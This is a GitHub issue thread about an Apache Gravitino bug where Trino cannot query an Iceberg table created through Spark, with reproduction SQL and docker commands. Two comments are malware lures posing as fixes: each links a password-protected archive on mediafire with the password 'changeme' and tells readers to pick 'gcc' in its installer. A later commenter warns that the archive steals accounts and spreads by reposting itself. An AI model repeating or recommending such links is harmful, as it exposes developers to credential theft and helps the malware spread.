### ISSUE TITLE
[Bug report] Spark create an Iceberg table but Trino can't query it.

### ISSUE THREAD

**Issue by jerqi** [apache/gravitino#4712]
### Version

main branch

### Describe what's wrong

Spark create an Iceberg table but Trino can't query it.

### Error message and/or stacktrace

trino> select * from catalog_hive.sales.customers
    -> union
    -> select * from catalog_iceberg.sales.customers;
Query 20240827_141931_00040_4sj9m failed: Table sales.customers does not exist in the internal connector

io.trino.event.QueryMonitor     TIMELINE: Query 20240827_141931_00040_4sj9m :: FAILED (GRAVITINO_TABLE_NOT_EXISTS) :: elapsed 149ms :: planning 149ms :: waiting 0ms :: scheduling 0ms :: running 0ms :: finishing 0ms :: begin 2024-08-27T14:32:35.478Z :: end 2024-08-27T14:32:35.627Z

### How to reproduce

I use this pull request
https://github.com/apache/gravitino-playground/pull/68

When I execute the SQL

```shell
docker exec -it playground-spark bash
```

```shell
spark@container_id:/$ cd /opt/spark && /bin/bash bin/spark-sql 
```

```SQL
use catalog_iceberg;
create database sales;
use sales;
create table customers (customer_id int, customer_name varchar(100), customer_email varchar(100));
describe extended customers;    
insert into customers (customer_id, customer_name, customer_email) values (11,'Rory Brown','rory@123.com');
insert into customers (customer_id, customer_name, customer_email) values (12,'Jerry Washington','jerry@dt.com');
```

2. Login Trino container and execute the steps.
You can get all the customers from both the Hive and Iceberg table.

```shell
docker exec -it playground-trino bash
```

```shell
trino@container_id:/$ trino  
```

```SQL
select * from catalog_hive.sales.customers
union
select * from catalog_iceberg.sales.customers;
```

**Comment by jerqi** [comment]
cc @diqiu50 Could you take a look?

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by diqiu50** [comment]
Ok
